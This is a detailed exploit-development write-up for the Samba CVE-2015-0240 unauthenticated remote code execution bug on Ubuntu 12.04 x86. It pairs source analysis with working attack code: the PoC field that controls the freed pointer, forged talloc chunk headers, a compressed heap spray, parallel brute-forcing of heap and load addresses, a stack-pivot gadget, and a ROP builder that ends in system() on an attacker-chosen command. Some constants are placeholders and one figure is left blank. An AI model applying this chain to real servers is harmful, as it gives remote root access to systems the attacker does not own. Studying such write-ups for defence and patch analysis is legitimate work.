Exploiting the Samba CVE-2015-0240 Remote Code Execution Vulnerability in Practice
1. Demo
2. Background
On February 23, 2015, the Red Hat Product Security team published an advisory [1] for a vulnerability in the Samba server daemon smbd. Tracked as CVE-2015-0240, it affects almost all versions of Samba. Triggering it does not require authenticating to the Samba server, and smbd usually runs with root privileges. If the vulnerability can be used to execute arbitrary code, an attacker can remotely obtain root on the system, which makes it extremely dangerous; accordingly, its CVSS score is 10.
The root cause is that an uninitialized pointer on the stack is passed to the TALLOC_FREE() function. Exploiting it requires first controlling that uninitialized stack data, which depends on the stack layout of the compiled binary. For this reason, several overseas security researchers analyzed the smbd binaries shipped with different Linux distributions. Worawit Wang (@sleepya_) obtained the most useful results: he confirmed that on Ubuntu 12.04 x86 (Samba 3.6.3) and Debian 7 x86 (Samba 3.6.6) the vulnerability can be used for arbitrary remote code execution (see [2] for details). Later, researchers from NCC Group, a long-established UK security company, outlined an exploitation approach [4] but published neither the details nor exploit code. This article analyzes and implements an exploit that achieves arbitrary remote code execution against the Samba server on Ubuntu 12.04 x86 (Debian 7 x86 is similar).
3. Vulnerability Overview
Several articles have already analyzed this vulnerability [3], so only a brief introduction is given here. The bug is in the function _netr_ServerPasswordSet(). The local variable creds is expected to be initialized by netr_creds_server_step_check(). However, if crafted input makes netr_creds_server_step_check() fail, creds is passed to TALLOC_FREE() without ever having been initialized:
```c
NTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p,
                                 struct netr_ServerPasswordSet *r)
{
    NTSTATUS status = NT_STATUS_OK;
    int i;
    struct netlogon_creds_CredentialState *creds;

    [...]
    status = netr_creds_server_step_check(p, p->mem_ctx,
                                          r->in.computer_name,
                                          r->in.credential,
                                          r->out.return_authenticator,
                                          &creds);
    unbecome_root();

    if (!NT_STATUS_IS_OK(status)) {
        [...]
        TALLOC_FREE(creds);
        return status;
    }
    [...]
}
```
4. Vulnerability Exploitation
First, let's look at the protection mechanisms enabled in the smbd binary:
```
$ checksec.sh --file smbd
RELRO        STACK CANARY   NX          PIE          RPATH      RUNPATH      FILE
Full RELRO   Canary found   NX enabled  PIE enabled  No RPATH   No RUNPATH   smbd
```
Every protection the compiler can add is enabled. The most important one is PIE: to reuse code snippets from the binary in a ROP chain, or to call an imported function, we must first learn the address at which the program is loaded.
4.1 Arbitrary-Address Free
To exploit this vulnerability, we first need a control path that lets us control the uninitialized pointer creds on the stack, so that we can call TALLOC_FREE() on an arbitrary address. From @sleepya_'s PoC we already know that on Ubuntu 12.04 and Debian 7 x86, the ReferentID field of PrimaryName in the NetrServerPasswordSet request lands in the stack slot of the uninitialized pointer creds. By choosing the ReferentID, we can therefore free an arbitrary address. The relevant PoC code is:
```python
from impacket.dcerpc.v5 import nrpc

primaryName = nrpc.PLOGONSRV_HANDLE()
# ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
primaryName.fields['ReferentID'] = 0x41414141
```
4.2 EIP Control
With an arbitrary-address free, we can try to make TALLOC_FREE() release a memory block that we control. The problem is that we do not know the address of any memory we control (the data from the DCERPC request is stored on the heap). We can brute-force the heap address, because smbd forks a new process to handle each connection, so the memory layout stays the same across connections. In addition, we can spray a large number of TALLOC chunks onto the heap to raise the hit rate and shrink the search space. For now, assume we already know the heap address, and look at how to craft a TALLOC chunk that hijacks EIP. This requires understanding how TALLOC_FREE is implemented, starting with the layout of a TALLOC chunk header:
```c
struct talloc_chunk {
    struct talloc_chunk *next, *prev;
    struct talloc_chunk *parent, *child;
    struct talloc_reference_handle *refs;
    talloc_destructor_t destructor;
    const char *name;
    size_t size;
    unsigned flags;
    void *pool;
    /* 8 bytes of padding */
};
```
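On 32-bit x86 the header size can be computed directly. This sketch assumes an ILP32 build in which all ten fields are 4 bytes with no internal padding, and that talloc rounds the header size up to a multiple of 16 with `((s) + 15) & ~15` (its `TC_ALIGN16` macro, as we understand the source). `FIELD_OFFSETS` is a helper introduced here only for illustration.

```python
import struct

# Ten 4-byte fields on 32-bit x86: next, prev, parent, child, refs,
# destructor, name, size, flags, pool (assumption: ILP32, no internal padding).
RAW_SIZE = struct.calcsize("<10I")

def align16(size):
    """Round size up to a multiple of 16, as talloc's TC_ALIGN16 is assumed to do."""
    return (size + 15) & ~15

TC_HDR_SIZE = align16(RAW_SIZE)

# Byte offset of each field from the start of the header.
FIELD_OFFSETS = {name: 4 * i for i, name in enumerate(
    ["next", "prev", "parent", "child", "refs",
     "destructor", "name", "size", "flags", "pool"])}

print(RAW_SIZE, TC_HDR_SIZE)  # 40 48
```

The offsets of `refs` (16) through `flags` (32) are the ones that matter when forging a header.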
For 16-byte alignment, 8 bytes of padding follow the structure, so a talloc_chunk header occupies 48 bytes in total on 32-bit x86. In this structure, destructor is a function pointer, and we can set it to any value. Next, let's look at the code that the TALLOC_FREE macro expands to:
```c
_PUBLIC_ int _talloc_free(void *ptr, const char *location)
{
    struct talloc_chunk *tc;

    if (unlikely(ptr == NULL)) {
        return -1;
    }

    tc = talloc_chunk_from_ptr(ptr);
    ...
}
```
_talloc_free() then calls talloc_chunk_from_ptr(), which converts the user pointer (the pointer ptr returned to the caller at allocation time) into a talloc_chunk pointer:
```c
/* panic if we get a bad magic value */
static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)
{
    const char *pp = (const char *)ptr;
    struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE);
    if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {
        if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) {
            talloc_abort_magic(tc->flags & (~0xF));
            return NULL;
        }

        if (tc->flags & TALLOC_FLAG_FREE) {
            talloc_log("talloc: access after free error - first free may be at %s\n", tc->name);
            talloc_abort_access_after_free();
            return NULL;
        } else {
            talloc_abort_unknown_value();
            return NULL;
        }
    }
    return tc;
}
```
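To make the flags check concrete, the sketch below evaluates the same expression on 32-bit values. The flag bits `TALLOC_FLAG_FREE = 0x01` and `TALLOC_FLAG_LOOP = 0x02` follow talloc.c as we understand it, and `TALLOC_MAGIC` is a hypothetical placeholder: the real value depends on the talloc version built into smbd and has to be taken from the target binary.

```python
MASK32 = 0xFFFFFFFF

# Flag bits as assumed from talloc.c; verify against the talloc version in use.
TALLOC_FLAG_FREE = 0x01
TALLOC_FLAG_LOOP = 0x02

# Hypothetical magic value, for illustration only.
TALLOC_MAGIC = 0xE8150C70

def passes_magic_check(flags):
    """Return True if talloc_chunk_from_ptr() would accept this flags word.

    Mirrors (tc->flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC
    computed on unsigned 32-bit values.
    """
    mask = (TALLOC_FLAG_FREE | ~0xF) & MASK32   # 0xFFFFFFF1
    return (flags & mask) == TALLOC_MAGIC

print(passes_magic_check(TALLOC_MAGIC))                     # True
print(passes_magic_check(TALLOC_MAGIC | TALLOC_FLAG_FREE))  # False: looks already freed
print(passes_magic_check(0x41414141))                       # False: bad magic
```

The mask ignores the other low-order flag bits, so a flags word with `TALLOC_FLAG_LOOP` set still passes this check; that bit only matters later, in `_talloc_free_internal()`.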
This function simply subtracts TC_HDR_SIZE from the user pointer and returns the result. TC_HDR_SIZE is the size of talloc_chunk, i.e. 48, but tc->flags must pass the check above, that is, it must hold the correct magic number; otherwise the function does not return a valid pointer. Next, let's continue with _talloc_free():
```c
_PUBLIC_ int _talloc_free(void *ptr, const char *location)
{
    ...
    tc = talloc_chunk_from_ptr(ptr);

    if (unlikely(tc->refs != NULL)) {
        struct talloc_reference_handle *h;

        if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) {
            return talloc_unlink(null_context, ptr);
        }

        talloc_log("ERROR: talloc_free with references at %s\n", location);
        for (h=tc->refs; h; h=h->next) {
            talloc_log("\treference at %s\n", h->location);
        }
        return -1;
    }

    return _talloc_free_internal(ptr, location);
}
```
If tc->refs is not NULL, execution enters the if branch. To avoid crashing in the nested if, we would need tc->parent to be NULL, and the following for loop would require tc->refs to point to a valid linked list, which is somewhat complicated. So let's consider the case where tc->refs is NULL, in which the program enters _talloc_free_internal():
```c
static inline int _talloc_free_internal(void *ptr, const char *location)
{
    ...
    if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {
        /* we have a free loop - stop looping */
        return 0;
    }

    if (unlikely(tc->destructor)) {
        talloc_destructor_t d = tc->destructor;
        if (d == (talloc_destructor_t)-1) {
            return -1;
        }
        tc->destructor = (talloc_destructor_t)-1;
        if (d(ptr) == -1) { // call destructor
            tc->destructor = d;
            return -1;
        }
        tc->destructor = NULL;
    }
    ...
}
```
We skipped the irrelevant parts of the function. The function above calls the talloc_chunk's destructor, but there are checks before that. In the first if, flags must not have TALLOC_FLAG_LOOP set. In the second if, if destructor is -1 the function returns -1 and the program does not crash, whereas if destructor is any other invalid address the program crashes. We can use this behavior to verify whether a brute-forced heap address is correct: during enumeration we set destructor to -1, and once we find an address passed to TALLOC_FREE() that does not crash the process (the request returns normally), we retry with destructor set to an invalid address. If the process now crashes, the address we found is correct. Let's summarize the conditions that the forged chunk must satisfy:
```c
struct talloc_chunk {
    struct talloc_chunk *next, *prev;      // no requirement
    struct talloc_chunk *parent, *child;   // no requirement
    struct talloc_reference_handle *refs;  // required: refs = 0
    talloc_destructor_t destructor;        // -1: no crash; other values: controlled EIP
    const char *name;
    size_t size;
    unsigned flags;  // condition 1: (flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC
                     // condition 2: (flags & TALLOC_FLAG_LOOP) == 0
    void *pool;      // no requirement
    /* 8 bytes of padding: no requirement */
};
```
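These conditions can be condensed into a small decision function. This is a rough model, not talloc itself: `FakeChunk` and `free_outcome` are hypothetical names, only the branches quoted in this section are modelled, the flag values are assumed from talloc.c, and `TALLOC_MAGIC` is a hypothetical placeholder.

```python
from dataclasses import dataclass

MASK32 = 0xFFFFFFFF
TALLOC_FLAG_FREE = 0x01      # assumed flag values from talloc.c
TALLOC_FLAG_LOOP = 0x02
TALLOC_MAGIC = 0xE8150C70    # hypothetical magic value, for illustration only

@dataclass
class FakeChunk:
    refs: int
    destructor: int
    flags: int

def free_outcome(tc):
    """Rough model of _talloc_free() -> _talloc_free_internal() for a forged header."""
    if (tc.flags & ((TALLOC_FLAG_FREE | ~0xF) & MASK32)) != TALLOC_MAGIC:
        return "abort: bad magic"            # talloc_chunk_from_ptr() aborts
    if tc.refs != 0:
        return "references path (needs a valid list)"
    if tc.flags & TALLOC_FLAG_LOOP:
        return "return 0: free loop"         # destructor never called
    if tc.destructor == 0:
        return "no destructor: normal free continues"
    if tc.destructor == 0xFFFFFFFF:          # (talloc_destructor_t)-1
        return "return -1: no crash"
    return "call destructor at 0x%08x" % tc.destructor

print(free_outcome(FakeChunk(refs=0, destructor=0xFFFFFFFF, flags=TALLOC_MAGIC)))
print(free_outcome(FakeChunk(refs=0, destructor=0x41414141, flags=TALLOC_MAGIC)))
```

The first call corresponds to the safe probe used while brute-forcing, the second to the EIP hijack.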
At this point we know how to control EIP by forging a chunk and passing it to TALLOC_FREE().
4.3 Brute-Forcing the Heap Address
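A forged 48-byte header that satisfies these conditions might be packed as follows. This is a sketch assuming a little-endian 32-bit target; `forge_chunk` is a hypothetical helper, and `TALLOC_MAGIC` is a placeholder that must be replaced with the value used by the target's talloc. The pointer handed to `TALLOC_FREE()` would be the header address plus 48.

```python
import struct

TC_HDR_SIZE = 48             # 40-byte struct padded to 16 bytes on 32-bit x86
TALLOC_MAGIC = 0xE8150C70    # hypothetical magic value, for illustration only

def forge_chunk(destructor, name=0, size=0, magic=TALLOC_MAGIC):
    """Build a fake talloc_chunk header (little-endian, 32-bit).

    next/prev/parent/child, pool and padding have no requirements and are zeroed;
    refs must be NULL; flags carries the magic with FREE and LOOP clear.
    """
    header = struct.pack(
        "<10I",
        0, 0, 0, 0,                # next, prev, parent, child: don't care
        0,                         # refs: must be NULL
        destructor & 0xFFFFFFFF,   # -1 for a safe probe, otherwise the target EIP
        name, size,
        magic,                     # flags
        0)                         # pool: don't care
    return header + b"\x00" * (TC_HDR_SIZE - len(header))  # 8 bytes of padding

probe = forge_chunk(-1)
hijack = forge_chunk(0x41414141)
```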
After modifying the PoC and debugging with gdb, we found that the new-password field (uasNewPass['data'] in the PoC) can be used to spray a large number of chunks. Although much of the data sent to Samba in a request is stored on the heap (for example, the username and password; see [2]), most of it must be valid WSTR-encoded data and cannot contain arbitrary bytes. To make heap brute-forcing more efficient, we follow the idea from [4] and compress each chunk down to the five fields refs, destructor, name, size, and flags, shrinking it from 48 bytes to 20 bytes. As a result, for each candidate address we only need to try 5 offsets instead of the original 12.
[Figure: mapping between the compressed sprayed chunk and the actual talloc_chunk structure]
The number of sprayed chunks also affects brute-force efficiency. Spraying more chunks shrinks the search space, but increases the per-attempt cost of network transfer and input processing. The value therefore has to be tuned as a trade-off for the actual environment. In addition, our exploit uses a process pool to enumerate candidates in parallel, which speeds up the search.
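The effect of compression on the search can be checked with a small simulation. The sketch assumes the field offsets of the 32-bit header (refs at +16 through flags at +32, with TC_HDR_SIZE = 48); `SPRAY_ADDR`, the `name` value and `TALLOC_MAGIC` are hypothetical placeholders. For each 4-byte-aligned guess it checks whether `TALLOC_FREE(guess)` would read `refs == NULL` and a valid magic out of the repeated 20-byte unit.

```python
import struct

TC_HDR_SIZE = 48
TALLOC_MAGIC = 0xE8150C70   # hypothetical magic value, for illustration only
UNIT = 20                   # refs, destructor, name, size, flags

def compressed_unit(destructor, name, size=0):
    """One 20-byte sprayed unit holding only the header fields that matter."""
    return struct.pack("<5I", 0, destructor & 0xFFFFFFFF, name, size, TALLOC_MAGIC)

def build_spray(count, destructor, name):
    return compressed_unit(destructor, name) * count

def header_ok(spray, spray_addr, ptr):
    """Would TALLOC_FREE(ptr) read refs == NULL and a valid magic from the spray?"""
    refs_off = ptr - TC_HDR_SIZE + 16 - spray_addr   # refs is at tc + 16
    if refs_off < 0 or refs_off + UNIT > len(spray):
        return False
    refs, _destructor, _name, _size, flags = struct.unpack_from("<5I", spray, refs_off)
    return refs == 0 and flags == TALLOC_MAGIC

SPRAY_ADDR = 0x10000000     # hypothetical address where the spray starts
spray = build_spray(100, destructor=-1, name=0x0804F00D)
window = range(SPRAY_ADDR + 0x400, SPRAY_ADDR + 0x400 + UNIT, 4)
hits = [p for p in window if header_ok(spray, SPRAY_ADDR, p)]
print(len(window), len(hits))  # 5 1
```

Exactly one of the five aligned positions in each 20-byte period works, which is why each candidate address needs five offsets; with uncompressed 48-byte chunks the same argument gives one in twelve.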
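The search loop, together with the two-step confirmation described in section 4.2, could be organized as below. Everything target-specific is simulated: `survives()` is a hypothetical stand-in for sending a request and checking whether the connection survived, `_SECRET_HIT` plays the role of the unknown heap address, and the candidate window and 0x10000 step (assumed to be no larger than the sprayed region) are made-up values. The article uses a process pool; this sketch uses `ThreadPoolExecutor`, which is sufficient when each probe is dominated by network I/O.

```python
from concurrent.futures import ThreadPoolExecutor

# Hypothetical stand-in for the unknown heap address that hits a sprayed header.
_SECRET_HIT = 0x0A1B0008

def survives(ptr, destructor):
    """Simulated probe: True if the smbd child survives TALLOC_FREE(ptr).

    Hypothetical model: a miss always kills the child (bad magic -> abort);
    a hit survives only when the forged destructor is -1.
    """
    return ptr == _SECRET_HIT and destructor == 0xFFFFFFFF

def confirm(ptr):
    """Two-step check: survive with destructor = -1, crash with an invalid one."""
    return survives(ptr, 0xFFFFFFFF) and not survives(ptr, 0x41414141)

def search(candidates, workers=8):
    """Probe candidates in parallel; return the first confirmed address or None."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for ptr, ok in zip(candidates, pool.map(confirm, candidates)):
            if ok:
                return ptr
    return None

# Hypothetical window and step; five offsets per step cover the 20-byte period.
candidates = [base + off
              for base in range(0x0A000000, 0x0B000000, 0x10000)
              for off in range(0, 20, 4)]
print(hex(search(candidates)))  # 0xa1b0008
```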
4.4 ROP
To build the ROP chain, we also need to enumerate the base address at which the Samba program is loaded. Because address randomization works at page granularity, we can enumerate in page-sized steps (0x1000 bytes). We tested a large number of candidate ranges on this platform; there are roughly 0x… possible base addresses, which is acceptable. At this point we control only EIP, through the forged destructor, so to run a ROP chain we first need a stack pivot. We found the following gadget in the Samba binary:
```
0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ;
```
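Enumerating the load base in page-sized steps and rebasing gadget offsets is simple arithmetic. In the sketch below, only the pivot offset 0x000a6d7c comes from this article; 4 KiB pages are assumed, and the search window is a hypothetical placeholder that would have to be measured on the target.

```python
PAGE = 0x1000               # assumed 4 KiB pages (x86)
PIVOT_OFF = 0x000A6D7C      # offset of "lea esp, [ecx-4]; ret" in the smbd binary

def candidate_bases(lo, hi):
    """Page-aligned load bases from lo (rounded up) to hi (exclusive)."""
    start = (lo + PAGE - 1) & ~(PAGE - 1)
    return range(start, hi, PAGE)

def rebase(base, offset):
    """Absolute 32-bit address of a gadget or PLT entry for a guessed base."""
    return (base + offset) & 0xFFFFFFFF

# Hypothetical search window; the real one must be measured on the target.
bases = candidate_bases(0xB7700000, 0xB7800000)
print(len(bases), hex(rebase(bases[0], PIVOT_OFF)))  # 256 0xb77a6d7c
```

Every other gadget and PLT address in the chain is rebased the same way for each guessed base.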
When the destructor is called, ecx-0x4 points to the name field of the chunk whose destructor hijacked EIP, so the ROP chain starts from that name field. By placing a pop4ret gadget (pop eax; pop esi; pop edi; pop ebp; ret) in name, we move esp to the name field of the next compressed chunk, and so on, until esp reaches the end of our sprayed memory; from there we can write a ROP payload of unlimited length.
[4] does not give the specific stack-pivot gadget, but judging from the illustration in that article, the NCC Group researchers appear to use the same gadget.
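The resulting chain can be traced with a toy emulator. `PIVOT`, `POP4RET` and `FIRST_GADGET` are hypothetical addresses, and the model assumes exactly what the text describes: after the pivot, esp points at the `name` field of the unit that was hit, and `pop4ret` consumes four dwords. Under this model esp advances 20 bytes per hop, and the last `pop4ret` also consumes 8 bytes past the end of the sprayed units, so the real payload would start 8 bytes after them.

```python
import struct

UNIT = 20                   # refs, destructor, name, size, flags
TALLOC_MAGIC = 0xE8150C70   # hypothetical magic value
PIVOT = 0x080A6D7C          # hypothetical address of "lea esp, [ecx-4]; ret"
POP4RET = 0x08012345        # hypothetical address of "pop eax; pop esi; pop edi; pop ebp; ret"
FIRST_GADGET = 0xDEADBEEF   # hypothetical first gadget of the real ROP payload

def build_sled(count):
    """count compressed units: destructor = pivot, name = pop4ret."""
    return struct.pack("<5I", 0, PIVOT, POP4RET, 0, TALLOC_MAGIC) * count

def walk(mem, esp):
    """Follow the rets starting with esp = &name of the hit unit.

    Returns (offsets at which a ret popped its target, first non-pop4ret target).
    """
    rets = []
    while esp + 4 <= len(mem):
        (target,) = struct.unpack_from("<I", mem, esp)
        rets.append(esp)
        if target != POP4RET:
            return rets, target
        esp += 4 + 16   # the ret pops 4 bytes, pop4ret pops four more dwords
    return rets, None

sled = build_sled(10)
mem = sled + b"JUNKJUNK" + struct.pack("<I", FIRST_GADGET)
rets, target = walk(mem, 3 * UNIT + 8)   # pretend unit 3 was the hit
print([hex(r) for r in rets], hex(target))
```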
4.5 Arbitrary Code Execution
Note that smbd imports system(), so we can call system through its PLT entry to execute arbitrary commands. But where do we put the command string? If we place it in the heap, we only know the addresses of the compressed chunks, and only four contiguous bytes are usable there. Instead, we call snprintf repeatedly to write the command into the .bss section one byte at a time, which lets us execute commands of any length. Because the binary is position-independent code (PIC), ebx must be loaded with the GOT address before calling snprintf and system through the PLT. The Python code that generates the ROP payload is as follows:
```python
import struct

def l32(x):
    """Pack x as a 32-bit little-endian value."""
    return struct.pack("<I", x & 0xFFFFFFFF)

def build_rop(cmd, popebx, got, snprintf, pop4ret, bss, fmt, system):
    """All address arguments are absolute (already rebased) addresses."""
    # ebx => GOT, needed by the PIC PLT stubs of snprintf and system
    rop = l32(popebx) + l32(got)
    # write cmd to .bss one byte at a time: snprintf(bss + i, 2, fmt, c), fmt == "%c"
    for i, c in enumerate(cmd.encode()):
        rop += l32(snprintf) + l32(pop4ret)   # pop4ret discards snprintf's 4 arguments
        rop += l32(bss + i) + l32(2) + l32(fmt) + l32(c)
    # system(cmd); b"leet" is a dummy return address
    rop += l32(system) + b"leet" + l32(bss)
    return rop
```
[4] instead uses the traditional approach of mmap() + memcpy() followed by executing shellcode, which achieves the same effect.